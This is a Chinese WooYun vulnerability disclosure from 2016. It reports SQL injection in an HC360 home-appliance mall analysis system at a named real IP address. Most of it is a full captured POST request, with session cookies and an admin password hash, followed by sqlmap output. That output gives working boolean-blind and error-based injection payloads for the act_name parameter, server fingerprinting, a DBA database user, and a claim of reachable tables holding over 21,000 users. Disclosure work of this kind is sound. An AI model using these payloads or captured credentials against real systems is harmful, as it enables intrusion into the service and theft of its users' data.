当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173397

漏洞标题:慧聪网某站点存在SQL注入漏洞涉及2W+条用户数据之三

相关厂商:慧聪网

漏洞作者: pudding2

提交时间:2016-01-28 17:55

修复时间:2016-03-13 18:02

公开时间:2016-03-13 18:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-28: 细节已通知厂商并且等待厂商处理中
2016-01-29: 厂商已经确认,细节仅向厂商公开
2016-02-08: 细节向核心白帽子及相关领域专家公开
2016-02-18: 细节向普通白帽子公开
2016-02-28: 细节向实习白帽子公开
2016-03-13: 细节向公众公开

简要描述:

慧聪网某站点存在SQL注入漏洞涉及2W+条用户数据之三

详细说明:

续:WooYun-2016-173045
慧聪家电城的经营分析系统存在SQL注入漏洞,最多用户的表涉及21677条用户数据
漏洞URL:http://58.252.73.136:8000/ActivityStatistics.aspx(慧聪家电城的经营分析系统)

4.jpg

POST /ActivityStatistics.aspx HTTP/1.1
Host: 58.252.73.136:8000
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.252.73.136:8000/ActivityStatistics.aspx
Cookie: iconSize=16x16; _pk_id.9.1549=c5212d09a738e870.1453532641.2.1453863564.1453863325.; ECS[visit_times]=6; Hm_lvt_f8b4f3f9251c122a04fe1c11caba248c=1453532839,1453628139,1453703226,1453863154; ECS[display]=grid; _pk_id.5.1549=a8a501c4964f2499.1453532858.1.1453532858.1453532858.; Hm_lvt_fd16bacbe2d90b129666bbde3ee2b5c6=1453532858; DTRememberName=test; ECS_ID=929fee0bac53c1d567ab0cde7cda9af2da4aeae9; Hm_lpvt_f8b4f3f9251c122a04fe1c11caba248c=1453863181; AdminName=MxWeiXinPF=test; AdminPwd=MxWeiXinPF=2CF8FE5DCB0BC697; ASP.NET_SessionId=vpyihj1zxbl0srl2icrcws51; nowweixinId=MxWeiXinPF=29; _pk_ses.9.1549=*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4192
__VIEWSTATE=%2FwEPDwULLTE4MjQ2OTQ1MTUPZBYCAgMPZBYEAgsPFgIeC18hSXRlbUNvdW50AgUWCgIBD2QWAmYPFQ0Y5pmo5qyjODIx57K%2B5ZOB6LGG5rWG5py6cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMTggMDA6MDA6MDAMMuWkqTE05bCP5pe2AzIzMhjmmajmrKPnsr7lk4HosYbmtYbmnLo4MjEEMC4wMAQwLjAwATABMAEwATAAZAICD2QWAmYPFQ0S5pmo5qyj6LGG5rWG5py6ODE2cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xNSAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMjEgMTY6MDA6MDALNuWkqTblsI%2Fml7YENTA0MRLmmajmrKPosYbmtYbmnLo4MTYEMC4wMAQwLjAwATABMAMxNjIDMTYyzAI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfmmajmrKPosYbmtYbmnLo4MTYnLCfmmajmrKPosYbmtYbmnLo4MTYnLCcwaCwxaCwyaCwzaCw0aCw1aCw2aCw3aCw4aCw5aCwxMGgsMTFoLDEyaCwxM2gsMTRoLDE1aCwxNmgsMTdoLDE4aCwxOWgsMjBoLDIxaCwyMmgsMjNoJywnMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI%2B6K%2Bm57uGPC9hPmQCAw9kFgJmDxUNJOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKXLmmK%2FlkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8%2BPGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTQgMTA6MDA6MDA8YnIvPue7k%2BadnzoyMDE1LTEyLTE3IDAwOjAwOjAwDDLlpKkxNOWwj%2BaXtgQ0NDY0JOS5kOmAlOWPluaaluWZqOeUteWPluaaluWZqE5TSC0xMihCKQQwLjAwBDAuMDABMAEwATgBOPACPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIiAgb25jbGljaz0iQWN0aXZlU3RhdGlzdGljc0RldGFpbFJlcG9ydCgn5LmQ6YCU5Y%2BW5pqW5Zmo55S15Y%2BW5pqW5ZmoTlNILTEyKEIpJywn5LmQ6YCU5Y%2BW5pqW5Zmo55S15Y%2BW5pqW5ZmoTlNILTEyKEIpJywnMGgsMWgsMmgsM2gsNGgsNWgsNmgsN2gsOGgsOWgsMTBoLDExaCwxMmgsMTNoLDE0aCwxNWgsMTZoLDE3aCwxOGgsMTloLDIwaCwyMWgsMjJoLDIzaCcsJzAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwJykiPuivpue7hjwvYT5kAgQPZBYCZg8VDRnpn6nlhqDmhaLpgJ%2Fljp%2FmsYHmnLpCMTg4cuaYr%2BWQpua4heS7kyZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMveWVzLmdpZiIgLz48YnIvPua4heS7k%2BaOqOiNkCZuYnNwOyA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvbm8uZ2lmIiAvPjnlvIDlp4s6MjAxNS0xMi0xMCAxMDowMDowMDxici8%2B57uT5p2fOjIwMTUtMTItMTUgMDA6MDA6MDAMNOWkqTE05bCP5pe2BDEwNDAZ6Z%2Bp5Yag5oWi6YCf5Y6f5rGB5py6QjE4OAcxMDY4LjAwBjUzNC4wMAEyATYBMAE23gI8YSBocmVmPSJqYXZhc2NyaXB0OnZvaWQoMCkiICBvbmNsaWNrPSJBY3RpdmVTdGF0aXN0aWNzRGV0YWlsUmVwb3J0KCfpn6nlhqDmhaLpgJ%2Fljp%2FmsYHmnLpCMTg4Jywn6Z%2Bp5Yag5oWi6YCf5Y6f5rGB5py6QjE4OCcsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw1MzQuMDAsMC4wMCw1MzQuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAnKSI%2B6K%2Bm57uGPC9hPmQCBQ9kFgJmDxUNFeagvOWtkOeUteeBq%2BmUhUdaLUQzMXLmmK%2FlkKbmuIXku5MmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL3llcy5naWYiIC8%2BPGJyLz7muIXku5PmjqjojZAmbmJzcDsgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL25vLmdpZiIgLz455byA5aeLOjIwMTUtMTItMTAgMTA6MDA6MDA8YnIvPue7k%2BadnzoyMDE1LTEyLTE1IDAwOjAwOjAwDDTlpKkxNOWwj%2BaXtgQ1MDU0FeagvOWtkOeUteeBq%2BmUhUdaLUQzMQc2OTEyLjAwBjg2NC4wMAE4AzE0NAIxNgMxNjDeAjxhIGhyZWY9ImphdmFzY3JpcHQ6dm9pZCgwKSIgIG9uY2xpY2s9IkFjdGl2ZVN0YXRpc3RpY3NEZXRhaWxSZXBvcnQoJ%2BagvOWtkOeUteeBq%2BmUhUdaLUQzMScsJ%2BagvOWtkOeUteeBq%2BmUhUdaLUQzMScsJzBoLDFoLDJoLDNoLDRoLDVoLDZoLDdoLDhoLDloLDEwaCwxMWgsMTJoLDEzaCwxNGgsMTVoLDE2aCwxN2gsMThoLDE5aCwyMGgsMjFoLDIyaCwyM2gnLCcwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCw3NjguMDAsMC4wMCwzMDcyLjAwLDE1MzYuMDAsMC4wMCw3NjguMDAsMC4wMCwwLjAwLDAuMDAsMC4wMCwwLjAwLDc2OC4wMCcpIj7or6bnu4Y8L2E%2BZAINDw8WBB4LUmVjb3JkY291bnQClQEeEEN1cnJlbnRQYWdlSW5kZXgCAWRkZF0NHV9Lg94Cxmefq7EXaADjZGsbyGu%2F5Ejgya0HF49S&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBQLQ%2B7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1


注入点为act_name(POST),用户为DBA用户

Parameter: act_name (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=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&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND 3304=3304 AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: __VIEWSTATE=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&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBQLQ+7OfCQLmyba8DQKvnKOtAQLo442vBQK7l6b7Cu8JAfiPq8YfBMS1qvd2w9f9T6zL8lXp4rNIql4MTX2W&act_name=1%' AND (SELECT 5121 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5121=5121,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&goods_name=1&btnReport=%E6%90%9C%E7%B4%A2&AspNetPager_input=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
current user: 'jdmall_test@%'
current database: 'jdmall_test'
current user is DBA: True

漏洞证明:

1、可读取数据库配置文件获取密码进而脱裤(这里就不深入了)

5.jpg


2、存在用户的数据库表(最多的一张有21677个用户)

1.jpg

2.jpg

3.jpg

修复方案:

1、过滤
2、这个分析系统后台不应该直接被外部访问吧,至少做个后台验证或者不允许外部访问什么的

版权声明:转载请注明来源 pudding2@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-29 10:45

厂商回复:

谢谢您

最新状态:

暂无


漏洞评价:

评价